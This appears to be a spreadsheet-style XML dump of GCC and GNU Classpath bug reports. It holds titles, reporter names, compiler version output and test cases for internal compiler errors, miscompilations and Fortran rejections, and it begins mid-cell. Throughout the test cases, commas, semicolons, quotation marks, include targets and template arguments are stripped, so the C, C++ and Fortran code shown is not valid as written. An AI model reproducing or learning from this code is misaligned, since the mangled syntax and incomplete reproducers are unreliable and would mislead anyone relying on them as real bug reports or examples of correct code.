--with-gmp=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gmp --with-mpfr=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/mpfr --enable-languages=cc++fortran --with-sysroot=/home/gfortran/gcc-home/binary/mingw32/cross/x86_32/gcc/4.4-20081107 --enable-libgomp --enable-threads=win32 --disable-win32-registry
Thread model: win32
gcc version 4.4.0 20081107 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-5177</t>
  </si>
  <si>
    <t>Problem with gcc-3.0.2 CPP and #define</t>
  </si>
  <si>
    <t xml:space="preserve">	I am trying to build RPM 4.0.3 (http://www.rpm.org/).  The compile
	stops in rpmdb/db3.c at a line that calls db-&gt;stat() (db is a DB*
	from the Berkeley DB library included with RPM):
    rc = db-&gt;stat(db 
	This generates an error from CPP about the number of arguments to
	stat:
db3.c:601:45: macro stat passed 3 arguments but takes just 2
	The Tru64 include file /usr/include/sys/stat.h includes the line
	(this is the only #define of a stat macro that I can find included
	from the file above):
#       define stat(__a__b) _F64_stat(__a__b)
	It looks like the preprocessor is trying to use the define of stat
	in the db-&gt;stat line which is not correct.  The Tru64 CPP has no
	problem with this code.
Release:
3.0.2
Environment:
System: OSF1 bugs.hiwaay.net V5.1 1885 alpha
Machine: alpha
	AlphaServer 1000A 5/300 Compaq Tru64 Unix 5.1A
host: alphaev5-dec-osf5.1
build: alphaev5-dec-osf5.1
target: alphaev5-dec-osf5.1
configured with: /usr/users/cmadams/ftp/gcc-3.0.2/configure --prefix=/usr/users/cmadams/strap --disable-shared --disable-nls --enable-languages=cc++
How-To-Repeat:
	Try to build rpm-4.0.3 on Tru64 5.1A with gcc-3.0.2.</t>
  </si>
  <si>
    <t>cmadams</t>
  </si>
  <si>
    <t>GCC-70251</t>
  </si>
  <si>
    <t>Wrong code with -O3 -march=skylake-avx512.</t>
  </si>
  <si>
    <t>Created attachment 37985
Reproducer.
Test case produces incorrect result with -O3 -march=skylake-avx512. It gives different result for every launch. Everything works fine with -O2 option.
Output:
&gt; g++ repr.cpp -o out -O3 -march=skylake-avx512 sde -skx -- ./out
12033857864019976279
&gt; g++ repr.cpp -o out -O2 -march=skylake-avx512 sde -skx -- ./out
5785906989299578598
GCC version:
&gt; g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/export/users/vlivinsk/gcc-trunk/bin/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/users/vlivinsk/gcc-trunk/gcc/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --enable-checking=release --enable-languages=cc++lto --with-gmp=/export/users/vlivinsk/gcc-trunk/gmp-6.1.0/bin --with-mpfr=/export/users/vlivinsk/gcc-trunk/mpfr-3.1.3/bin --with-mpc=/export/users/vlivinsk/gcc-trunk/mpc-1.0.3/bin --prefix=/export/users/vlivinsk/gcc-trunk/bin
Thread model: posix
gcc version 6.0.0 20160315 (experimental) (Revision=234226)
Test:
#include 
void hash(unsigned long long int &amp;seed unsigned long long int const &amp;v) {
    seed ^= v + 0x9e3779b9 + (seed&gt;2)
}
unsigned int a [100]
signed char b [100]
signed char c [100]
void init () {
    for (int i = 0 i &lt; 100 ++i) {
        a [i] = 1000L
        b [i] = 10
        c [i] = 5
    }
}
void foo () {
    for (int i = 0 i &lt; 100 ++i)
        b [i] = (!b [i] ^ (a [i] &gt;= b [i])) + c [i]
}
unsigned long long int checksum () {
    unsigned long long int seed = 0ULL
    for (int i = 0 i &lt; 100 ++i)
        hash(seed b [i])
    return seed
}
int main () {
    init ()
    foo ()
    std::cout &lt;&lt; checksum () &lt;&lt; std::endl
    return 0
}</t>
  </si>
  <si>
    <t>GCC-38857</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in selective scheduler</t>
  </si>
  <si>
    <t>With this test case the selective scheduler is hitting a gcc_assert in sel-sched-ir.c  I see this on IA64 Linux or on IA64 HP-UX when in 64 bit mode. 
In both cases it happens when compiling with -O3.
x.c: In function 'dv_guess_qnos':
x.c:22: internal compiler error: in sel_move_insn at sel-sched-ir.c:1395
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Test case:
static const int vs_total_ac_bits = 2680
typedef struct EncBlockInfo {
      short mb[64]
      unsigned char next[64]
} EncBlockInfo
inline void dv_guess_qnos(EncBlockInfo* blks int* qnos) {
      int size[5]
      int j k a prev
      EncBlockInfo* b
      for(a=2 a==2 || vs_total_ac_bits &lt; size[0] a+=a){
         for (j=0 j&lt;6*5 j++ b++) {
             for (k= b-&gt;next[prev] knext[k]) {
                 if(b-&gt;mb[k] mb[k] &gt; -a){
                     b-&gt;next[prev] = b-&gt;next[k]
                 }
                 else{
                     prev = k
                 }
             }
         }
     }
}</t>
  </si>
  <si>
    <t>GCC-20601</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] PRE related miscompilation</t>
  </si>
  <si>
    <t>extern void abort (void)
extern void exit (int)
struct T
{
  char *t1
  char t2[4096]
  char **t3
}
int a[5]
int b
char **c
int d
char **e
struct T t
char *f[16]
char *g[] = { a -u b c }
__attribute__ ((__noreturn__)) void
foo (void)
{
  while (1)
}
__attribute__ ((noinline)) char *
bar (char *x unsigned int y)
{
  return 0
}
static inline char *
baz (char *x unsigned int y)
{
  if (sizeof (t.t2) != (unsigned int) -1 &amp;&amp; y &gt; sizeof (t.t2))
    foo ()
  return bar (x y)
}
static inline int
setup1 (int x)
{
  char *p
  int rval
  if (!baz (t.t2 sizeof (t.t2)))
    baz (t.t2 sizeof (t.t2))
  if (x &amp; 0x200)
    {
      char **h **i = e
      ++d
      e = f
      if (t.t1 &amp;&amp; *t.t1)
        e[0] = t.t1
      else
        abort ()
      for (h = e + 1 (*h = *i) ++i ++h)
    }
  return 1
}
static inline int
setup2 (void)
{
  int j = 1
  e = c + 1
  d = b - 1
  while (d &gt; 0 &amp;&amp; e[0][0] == '-')
    {
      if (e[0][1] != '\0' &amp;&amp; e[0][2] != '\0')
        abort ()
      switch (e[0][1])
        {
        case 'u':
          if (!e[1])
            abort ()
          t.t3 = 
          d--
          e++
          break
        case 'P':
          j |= 0x1000
          break
        case '-':
          d--
          e++
          if (j == 1)
            j |= 0x600
          return j
        }
      d--
      e++
    }
  if (d &gt; 0 &amp;&amp; !(j &amp; 1))
    abort ()
  return j
}
int
main (void)
{
  int x
  c = g
  b = 4
  x = setup2 ()
  t.t1 = /bin/sh
  setup1 (x)
  if ((x &amp; 0x400) &amp;&amp; !a[4])
    abort ()
  exit (0)
}
is miscompiled on at least i386 x86_64 and ppc32 at -O2 (but e.g. on ppc64
is not).  The bug goes away with -O2 -fno-tree-pre.
At *.crited there is still:
xD.1586_12 = PHI 
later on used by
x.0D.1645_38 = (unsigned intD.3) xD.1586_12
...
  D.1589_46 = x.0D.1645_38 &gt;&gt; 10
  D.1590_47 = (intD.0) D.1589_46
  D.1591_48 = D.1590_47 
  if (D.1591_48 != 0) goto  else goto 
1537 == 0x601 is one of the possible values for x if g contained say --
as second argument but it is certainly not the only one (x should be 1 with
the g array provided in the testcase).
Yet PRE decides to use 0x601 so the
  if ((x &amp; 0x400) &amp;&amp; !a[4])
    abort ()
test aborts.</t>
  </si>
  <si>
    <t>GCC-33499</t>
  </si>
  <si>
    <t>Rejects valid module with a contained function with an ENTRY</t>
  </si>
  <si>
    <t>When I compile the module listed below I get the following messages:
c.f90:9.28:
    MODULE PROCEDURE cx_cadr cx_radc
                           1
Error: FUNCTION result cx_cadr can't be of type TYPE(cx) in FUNCTION cx_cadr at (1)
c.f90:19.18:
END MODULE complex
                 1
Error: Contained function 'master.0.cx_cadr' at (1) has no IMPLICIT type
c.f90:9.37:
    MODULE PROCEDURE cx_cadr cx_radc
                                    1
Error: Contained function 'cx_radc' at (1) has no IMPLICIT type
MODULE complex
  IMPLICIT NONE
  PRIVATE
  PUBLIC :: cx OPERATOR(+)
  TYPE cx
    REAL :: imag
  END TYPE cx
  INTERFACE OPERATOR (+)
    MODULE PROCEDURE cx_cadr cx_radc
  END INTERFACE
  CONTAINS
  FUNCTION cx_cadr(z r)
  ENTRY cx_radc(r z)
    TYPE (cx) :: cx_cadr cx_radc
    TYPE (cx) INTENT(IN) :: z
    REAL INTENT(IN) :: r
    cx_cadr%imag = z%imag
  END FUNCTION cx_cadr
END MODULE complex</t>
  </si>
  <si>
    <t>GCC-38915</t>
  </si>
  <si>
    <t>wrong results for structure assignment of character components when left and right sides overlap</t>
  </si>
  <si>
    <t>The following program gives the wrong results for the character assignments to a structure component.  The problem appears to occur when there is an overlap between the left and right hand sides of the assignment.  It is as if the character length of the right hand side is treated as 1 rather than 9 and then the left is blank padded to 9.  While experimenting with this I tried some simple things like L(1:2)%c = R(2:3)%c and they all worked.
Dick Hendrickson
       program cg0033_41
! fails on Windows XP
! gcc version 4.4.0 20081219 (experimental) [trunk revision 142842] (GCC)
       type t
         sequence
         integer i
         character(len=9) c
       end type t
       type (t)  L(3)R(3) LL(4) RR(4)
       EQUIVALENCE (LLL)
       integer nfv1(3) nfv2(3)
       R(1)%c = '123456789'
       R(2)%c = 'abcdefghi'
       R(3)%c = '!@#$%^&amp;*('
       L%c = R%c
       print * 'simple assignment'
       print *  R%c
       print *  L%c
       LL(1:3)%c = R%c
       LL(4)%c = 'QWERTYUIO'
       RR%c = LL%c
       L%c = LL(2:4)%c
       print *
       print * 'overlapping assignment'
       print *  RR(2:4)%c
       print *  L%c
       nfv1 = (/123/)
       nfv2 = nfv1
       L%c = R%c
       L(nfv1)%c = L(nfv2)%c
       print *
       print * ' vvs assignment'
       print *  R%c
       print *  L%c
       end
C:\gfortran&gt;gfortran try_cg0033_41.f
C:\gfortran&gt;a
 simple assignment
 123456789abcdefghi!@#$%^&amp;*(
 123456789abcdefghi!@#$%^&amp;*(
 overlapping assignment
 abcdefghi!@#$%^&amp;*(QWERTYUIO
 a        !        Q
  vvs assignment
 123456789abcdefghi!@#$%^&amp;*(
 1        a        !</t>
  </si>
  <si>
    <t>GCC-64939</t>
  </si>
  <si>
    <t>ICE in extract_insn at recog.c:2202</t>
  </si>
  <si>
    <t>While trying to build clisp-2.48 on 64-bit Cygwin:
$ gcc -v -save-temps -I/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/gllib -ggdb -O2 -pipe -Wimplicit-function-declaration -W -Wswitch -Wcomment -Wpointer-arith -Wimplicit -Wreturn-type -Wmissing-declarations -Wno-sign-compare -Wno-format-nonliteral -O -falign-functions=4 -DUNICODE -I. -I$(/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/clisp -K boot -B /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build -N /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/locale -E UTF-8 -Epathname 1:1 -Emisc 1:1 -norc -q -b)/linkkit -c regexi.m.c -o regexi.o
gcc: warning: -pipe ignored because -save-temps specified
Using built-in specs.
COLLECT_GCC=gcc
Target: x86_64-pc-cygwin
Configured with: /cygdrive/i/szsz/tmpp/gcc/gcc-4.9.2-2.x86_64/src/gcc-4.9.2/configure --srcdir=/cygdrive/i/szsz/tmpp/gcc/gcc-4.9.2-2.x86_64/src/gcc-4.9.2 --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/libexec --datadir=/usr/share --localstatedir=/var --sysconfdir=/etc --libdir=/usr/lib --datarootdir=/usr/share --docdir=/usr/share/doc/gcc --htmldir=/usr/share/doc/gcc/html -C --build=x86_64-pc-cygwin --host=x86_64-pc-cygwin --target=x86_64-pc-cygwin --without-libiconv-prefix --without-libintl-prefix --libexecdir=/usr/lib --enable-shared --enable-shared-libgcc --enable-static --enable-version-specific-runtime-libs --enable-bootstrap --enable-__cxa_atexit --with-dwarf2 --with-tune=generic --enable-languages=adacc++fortranltoobjcobj-c++ --enable-graphite --enable-threads=posix --enable-libatomic --enable-libgomp --disable-libitm --enable-libquadmath --enable-libquadmath-support --enable-libssp --enable-libada --enable-libgcj-sublibs --disable-java-awt --disable-symvers --with-ecj-jar=/usr/share/java/ecj.jar --with-gnu-ld --with-gnu-as --with-cloog-include=/usr/include/cloog-isl --without-libiconv-prefix --without-libintl-prefix --with-system-zlib --enable-linker-build-id
Thread model: posix
gcc version 4.9.2 (GCC)
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-I' '/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/gllib' '-ggdb' '-O2' '-pipe' '-Wimplicit-function-declaration' '-Wextra' '-Wswitch' '-Wcomment' '-Wpointer-arith' '-Wimplicit' '-Wreturn-type' '-Wmissing-declarations' '-Wno-sign-compare' '-Wno-format-nonliteral' '-O' '-falign-functions=4' '-D' 'UNICODE' '-I' '.' '-I' '/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/linkkit' '-c' '-o' 'regexi.o' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/cc1.exe -E -quiet -v -I /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/gllib -I . -I /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/linkkit -Dunix -idirafter /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/../../../../lib/../include/w32api -idirafter /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/../../../../x86_64-pc-cygwin/lib/../lib/../../include/w32api -D UNICODE regexi.m.c -mtune=generic -march=x86-64 -Wimplicit-function-declaration -Wextra -Wswitch -Wcomment -Wpointer-arith -Wimplicit -Wreturn-type -Wmissing-declarations -Wno-sign-compare -Wno-format-nonliteral -falign-functions=4 -ggdb -fworking-directory -O2 -O -fpch-preprocess -o regexi.m.i
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/../../../../x86_64-pc-cygwin/include
ignoring duplicate directory /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/../../../../x86_64-pc-cygwin/lib/../lib/../../include/w32api
#include ... search starts here:
#include  search starts here:
 /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/gllib
 .
 /home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/linkkit
 /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/include
 /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/include-fixed
 /usr/include
 /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/../../../../lib/../include/w32api
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-I' '/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/gllib' '-ggdb' '-O2' '-pipe' '-Wimplicit-function-declaration' '-Wextra' '-Wswitch' '-Wcomment' '-Wpointer-arith' '-Wimplicit' '-Wreturn-type' '-Wmissing-declarations' '-Wno-sign-compare' '-Wno-format-nonliteral' '-O' '-falign-functions=4' '-D' 'UNICODE' '-I' '.' '-I' '/home/kbrown/src/cygclisp/clisp-2.48-5.x86_64/build/linkkit' '-c' '-o' 'regexi.o' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-pc-cygwin/4.9.2/cc1.exe -fpreprocessed regexi.m.i -quiet -dumpbase regexi.m.c -mtune=generic -march=x86-64 -auxbase-strip regexi.o -ggdb -O2 -O -Wimplicit-function-declaration -Wextra -Wswitch -Wcomment -Wpointer-arith -Wimplicit -Wreturn-type -Wmissing-declarations -Wno-sign-compare -Wno-format-nonliteral -version -falign-functions=4 -o regexi.m.s
GNU C (GCC) version 4.9.2 (x86_64-pc-cygwin)
        compiled by GNU C version 4.9.2 GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
warning: MPFR header version 3.1.2 differs from library version 3.1.2-p11.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.9.2 (x86_64-pc-cygwin)
        compiled by GNU C version 4.9.2 GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
warning: MPFR header version 3.1.2 differs from library version 3.1.2-p11.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: c41fcb4c7fc72aff019df8e89fe64f3e
regexi.c: In function â€˜C_subr_regexp_regexp_compileâ€™:
regexi.c:56:1: error: unrecognizable insn:
 }
 ^
(insn 349 348 350 35 (set (reg/f:DI 311)
        (plus:DI (symbol_ref:DI (module__regexp__subr_tab) [flags 0x2] )
            (reg:DI 312))) regexi.c:54 -1
     (expr_list:REG_EQUAL (const:DI (plus:DI (symbol_ref:DI (module__regexp__subr_tab) [flags 0x2] )
                (const_int 281474976710768 [0x1000000000070])))
        (nil)))
regexi.c:56:1: internal compiler error: in extract_insn at recog.c:2202
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>kbrow1i</t>
  </si>
  <si>
    <t>CLASSPATH-22810</t>
  </si>
  <si>
    <t>inetlib</t>
  </si>
  <si>
    <t>HTTPURLConnection.getHeaderField(int) throws exception rather than returning null</t>
  </si>
  <si>
    <t>In HTTPURLConnection getHeaderField(i) should return null if there are less than i+1 fields according to Sun's documentation and implementation. This merely requires a simple if(!i.hasNext()) return null in the beginning of the do/while loop at the end of this method.</t>
  </si>
  <si>
    <t>GCC-37264</t>
  </si>
  <si>
    <t>/usr/ccs/bin/ld: Unsatisfied symbols in gnu/gcj/tools/gcj_dbto</t>
  </si>
  <si>
    <t>libtool: link: /test/gnu/gcc/objdir/gcc/gcj -B/test/gnu/gcc/objdir/hppa2.0w-hp-h
pux11.11/libjava/ -B/test/gnu/gcc/objdir/gcc/ -g -O2 -o .libs/gcj-dbtool --main=
gnu.gcj.tools.gcj_dbtool.Main -shared-libgcc gnu/gcj/tools/gcj_dbtool/natMain.o
gnu/gcj/tools/.libs/gcj_dbtool.o  -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/l
ibjava/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libjava -L./.libs -lgc
j -lpthread -lrt  -Wl+b -Wl/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libjava/
.libs:/opt/gnu/gcc/gcc-4.4.0/lib
/usr/ccs/bin/ld: Unsatisfied symbols:
   bool java::lang::Class::isPrimitive() (first referenced in gnu/gcj/tools/gcj_
dbtool/natMain.o) (data)
   bool java::lang::Class::isArray() (first referenced in gnu/gcj/tools/gcj_dbto
ol/natMain.o) (data)
   _Jv_InitClass (first referenced in gnu/gcj/tools/gcj_dbtool/natMain.o) (data)</t>
  </si>
  <si>
    <t>GCC-44753</t>
  </si>
  <si>
    <t>[4.5 Regression] class partial specialization error</t>
  </si>
  <si>
    <t>The following code compiles on gcc-4.2/4.3/4.4 but doesn't on gcc-4.5 with error: aggregate â€˜foo 0&gt; barâ€™ has incomplete type and cannot be defined
template 
struct identity
{
    typedef T type
}
template 
struct foo {}
template 
struct foo A&gt; {}
int main()
{
    foo0&gt; bar // error here
}
g++ somehow is messed up because foo is defined and it should pick the partial specialization. If we comment the latter it compiles picking the main foo definition.</t>
  </si>
  <si>
    <t>rodolfo</t>
  </si>
  <si>
    <t>GCC-28930</t>
  </si>
  <si>
    <t>[4.2.0] regression</t>
  </si>
  <si>
    <t>During the build of glibc (2.3.6) there is a file (csu/initfini.c) that has several asm statements. After compiling the resulting asm file will be the source of some sed scripts that generates crti.S and crtn.S.
Using gcc-trunk snapshot from 20060828 and gcc-4.0.2 the generated files initfini.s differs to a point that the sed scripts gets totaly lost.
Attached is initfini.i the file generated by 4.0.2 (initfini.s) (which is what sed scripts expects) and the file generated with gcc-trunk (initfini-BAD.s)
Both compilers in question were configured with:
--target=powerpc-unkown-linux-gnuspe --enable-e500_double
The initfini.s file is obtained with:
gcc -g -g0 -fpic -finhibit-size-directive -fno-exceptions -O1 -S initfini.i</t>
  </si>
  <si>
    <t>GCC-56591</t>
  </si>
  <si>
    <t>Missing space</t>
  </si>
  <si>
    <t>gcc/config/avr/avr.c:2234:Unsupported code '%c'for fixed-point:</t>
  </si>
  <si>
    <t>GCC-15650</t>
  </si>
  <si>
    <t>[BC]: definite assignment checking is broken for static fields</t>
  </si>
  <si>
    <t>This only happens with the source compiler.
We don't notice that a
final x = 10
field has been assigned because the assignment is compiled to
this+*(klass-&gt;otable[N]) = 10
so we get error messages:
final_int.java:6: error: final field 'x' may not have been initialized
We need to teach check_init() about the otable.</t>
  </si>
  <si>
    <t>CLASSPATH-17008</t>
  </si>
  <si>
    <t>GdkGraphics: drawImage tries to cast Image to GtkImage.</t>
  </si>
  <si>
    <t>This is for method:   
public boolean drawImage (Image img int x int y int width int height
          Color bgcolor ImageObserver observer)
It tries to cast img to GtkImage.</t>
  </si>
  <si>
    <t>GCC-4579</t>
  </si>
  <si>
    <t>MMX &amp;&amp; Optimazation does not work</t>
  </si>
  <si>
    <t xml:space="preserve">	use of MMX or 3D!Now builtins and  optimazation (-O1 .. -O6) produce an internal compiler error in simplify_gen_subreg at simplify-rtx.c:2638
Release:
3.1 20011015 (experimental)
Environment:
System: Linux daniel 2.4.12 #2 Mon Okt 15 21:31:09 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure
How-To-Repeat:
Compile attached testcase with:
gcc -m3dnow -O2 test.c</t>
  </si>
  <si>
    <t>d-s-j</t>
  </si>
  <si>
    <t>GCC-12750</t>
  </si>
  <si>
    <t>time_get::_M_extract_via_format doesn't deal with 'e'</t>
  </si>
  <si>
    <t>Consider f.i. is_IS: its strftime format is '%a %e.%b %Y'.
However _M_extract_via_format doesn't have a case for 'e' and moreover it's
not trivial to add one since in the single digit case we have to skip the
initial space but _M_extract_num cannot currently do that.</t>
  </si>
  <si>
    <t>GCC-26829</t>
  </si>
  <si>
    <t>broken classpath install (missed tools.zip) zip or fastjar not found</t>
  </si>
  <si>
    <t>(...)
rm -rf classes
test -z /usr/share/classpath/tools || mkdir -p -- /tmp/gcc-4.2.0-root-pluto/usr/share/classpath/tools
 /usr/bin/install -c -m 644 '../../../../../libjava/classpath/tools/tools.zip' '/tmp/gcc-4.2.0-root-pluto/usr/share/classpath/tools/tools.zip'
/usr/bin/install: cannot stat `../../../../../libjava/classpath/tools/tools.zip': No such file or directory
make[6]: *** [install-TOOLSDATA] Error 1
make[6]: Leaving directory `/home/users/pluto/rpm/BUILD/trunk/builddir/x86_64-pld-linux/libjava/classpath/tools'</t>
  </si>
  <si>
    <t>GCC-39639</t>
  </si>
  <si>
    <t>no diagnostic for ill-formed pack expansion</t>
  </si>
  <si>
    <t>gcc 4.3.2 and a recent pull of 4.4 accept the following (presumably) ill-formed program:
$ cat t.C &amp;&amp; g++ -v &amp;&amp; g++ -std=c++0x t.C &amp;&amp; ./a.out
#include 
template 
struct S: S S S
{
    static const char* f () { return __PRETTY_FUNCTION__ }
}
int main ()
{
    std::puts (S::f ())
}
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /home/sebor/gcc/trunk/configure --prefix=/build/sebor/bin/gcc-4.4.0 --enable-languages=cc++ --with-mpfr=/usr/local/mpfr-2.3.1
Thread model: posix
gcc version 4.4.0 20081105 (experimental) (GCC) 
static const char* S::f() [with Types = void]</t>
  </si>
  <si>
    <t>GCC-83998</t>
  </si>
  <si>
    <t>[8 Regression] ICE in gfc_conv_intrinsic_dot_product at fortran/trans-intrinsic.c:4403</t>
  </si>
  <si>
    <t>Changed between 20171022 and 20171029 :
$ cat z1.f90
program p
   integer parameter :: a(0) = 1
   print * dot_product(a a)
end
$ gfortran-8-20171022 -static-libgfortran z1.f90
$ a.out
           0
$
$ gfortran-8-20180121 -c z1.f90
z1.f90:3:0:
    print * dot_product(a a)
internal compiler error: in gfc_conv_intrinsic_dot_product at fortran/trans-intrinsic.c:4403
0x787a5d gfc_conv_intrinsic_dot_product
        ../../gcc/fortran/trans-intrinsic.c:4403
0x79affa gfc_conv_intrinsic_function(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-intrinsic.c:8889
0x77ae55 gfc_conv_function_expr
        ../../gcc/fortran/trans-expr.c:6731
0x77b3f2 gfc_conv_expr(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-expr.c:7863
0x781ab8 gfc_conv_expr_reference(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-expr.c:7998
0x7a1226 gfc_trans_transfer(gfc_code*)
        ../../gcc/fortran/trans-io.c:2576
0x747d37 trans_code
        ../../gcc/fortran/trans.c:2028
0x79ecf7 build_dt
        ../../gcc/fortran/trans-io.c:2028
0x747d57 trans_code
        ../../gcc/fortran/trans.c:2000
0x76ef29 gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6451
0x6fecd0 translate_all_program_units
        ../../gcc/fortran/parse.c:6103
0x6fecd0 gfc_parse_file()
        ../../gcc/fortran/parse.c:6306
0x74520f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-43430</t>
  </si>
  <si>
    <t>Missed vectorization: stmt not supported: cond_expr</t>
  </si>
  <si>
    <t>This code from FFmpeg is not vectorized:
gcc-4.5 -c vsad_intra.c -O3 -ffast-math -ftree-vectorizer-verbose=7 -msse2
[...]
vsad_intra.c:15: note: not vectorized: relevant stmt not supported: iftmp.0_7 = [cond_expr] iftmp.0_35 &lt; 0 ? iftmp.0_77 : iftmp.0_35
typedef short DCTELEM
typedef unsigned char uint8_t
typedef long int x86_reg
typedef unsigned int uint32_t
typedef unsigned long int uint64_t
int
vsad16_c (void *c uint8_t * s1 uint8_t * s2 int stride int h)
{
  int score = 0
  int x y
  for (y = 1 y &lt; h y++)
    {
      for (x = 0 x &lt; 16 x++)
	{
	  score +=
	    ((s1[x] - s2[x] - s1[x + stride] + s2[x + stride]) &gt;=
	     0 ? (s1[x] - s2[x] - s1[x + stride] +
		  s2[x + stride]) : (-(s1[x] - s2[x] - s1[x + stride] +
				       s2[x + stride])))
	}
      s1 += stride
      s2 += stride
    }
  return score
}</t>
  </si>
  <si>
    <t>GCC-28943</t>
  </si>
  <si>
    <t>Unusable error message when using a conditional-expression with multiple type arguments</t>
  </si>
  <si>
    <t>When I use a conditional-expression(?:) with arguments whose type is not matching g++ gives an error message not telling me exactly what the problem is.
Commandline:
----
g++ assert_testcase.cpp
----
Output:
----
assert_testcase.cpp: In function int main():
assert_testcase.cpp:16: error: debug(((const char*)Some string)) has type void and is not a throw-expression
----
For this code (assert_testcase.cpp):
----
#include 
void debug( const char * string )
{
    printf( string )
}
int main()
{
    ( true == false ? 0 : debug( Some string ) )
    return 0
}
----
Changing ( true == false ? 0 : debug( Some string ) ) to ( true == false ? (void)0 : debug( Some string ) ) silences the error message.
And that has been found out after about a week of own research in our project and then asking in ##c++ on FreeNode because no one had a clue what it could mean. (And even ##c++ needed several hours to find that out.)
So I think that error message is unusable because it is not clear about what exactly the problem is.
Better would be IMHO something like 0 is of different type than debug(...).
Other info:
----
i686-pc-linux-gnu-g++ (GCC) 4.1.1 (Gentoo 4.1.1)
----
Preprocessed file (assert_testcase.ii) will be attached.
I can provide more information if you like.</t>
  </si>
  <si>
    <t>GCC-49665</t>
  </si>
  <si>
    <t>'defined in discarded section' link failures on cpu2006 benchmarks</t>
  </si>
  <si>
    <t>450.soplex (-O2) and 471.omnetpp fail to link in 64-bit mode with the same error.
450.soplex:
`soplex::SPxBasis::~SPxBasis()' referenced in section `.data.rel.ro._ZTVN6soplex8SPxBasisE[vtable for soplex::SPxBasis]' of spxbasis.o: defined in discarded section `.group' of spxbasis.o
`soplex::SPxLP::~SPxLP()' referenced in section `.data.rel.ro._ZTVN6soplex5SPxLPE[vtable for soplex::SPxLP]' of spxlp.o: defined in discarded section `.group' of spxlp.o
`soplex::LPRowSet::~LPRowSet()' referenced in section `.text' of spxlpfread.o: defined in discarded section `.group' of spxlpfread.o
`soplex::LPRowSet::~LPRowSet()' referenced in section `.text' of spxlpfread.o: defined in discarded section `.group' of spxlpfread.o
471.omnetpp:
`cEqdHistogramBase::~cEqdHistogramBase()' referenced in section `.data.rel.ro._ZTV17cEqdHistogramBase[vtable for cEqdHistogramBase]' of libs/sim/std/netpack.o: defined in discarded section `.group' of libs/sim/std/netpack.o</t>
  </si>
  <si>
    <t>GCC-69176</t>
  </si>
  <si>
    <t>[6 Regression] ICE in in final_scan_insn at final.c:2981 on aarch64-linux-gnu</t>
  </si>
  <si>
    <t>Created attachment 37243
preprocessed source
trunk r232077 aarch64-linux-gnu:
g++ src/faust-dsp-standalone.cpp -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -fPIC -DVERSI
ON=1.3.0 -I/usr/lib/faust -Isrc/ -Iinclude/ -DPREFIX=/usr -Wall -c -o src/faust-dsp-standalone.o
In file included from src/faust-dsp-standalone.cpp:31:0:
src/../gen/yc20-dsp-standalone.cpp: In member function 'virtual void mydsp::compute(int float** float**)':
src/../gen/yc20-dsp-standalone.cpp:1659:15: note: variable tracking size limit exceeded with -fvar-tracking-ass
ignments retrying without
  virtual void compute (int fullcount FAUSTFLOAT** input FAUSTFLOAT** output) {
               ^~~~~~~
In file included from src/faust-dsp-standalone.cpp:31:0:
src/../gen/yc20-dsp-standalone.cpp:19015:2: error: could not split insn
  }
  ^
(insn 152068 64217 64221 (set (reg:DI 1 x1 [88028])
        (plus:DI (reg/f:DI 29 x29)
            (const_int 129024 [0x1f800]))) src/../gen/yc20-dsp-standalone.cpp:10746 95 {*adddi3_pluslong}
     (nil))
src/../gen/yc20-dsp-standalone.cpp:19015:2: internal compiler error: in final_scan_insn at final.c:2981
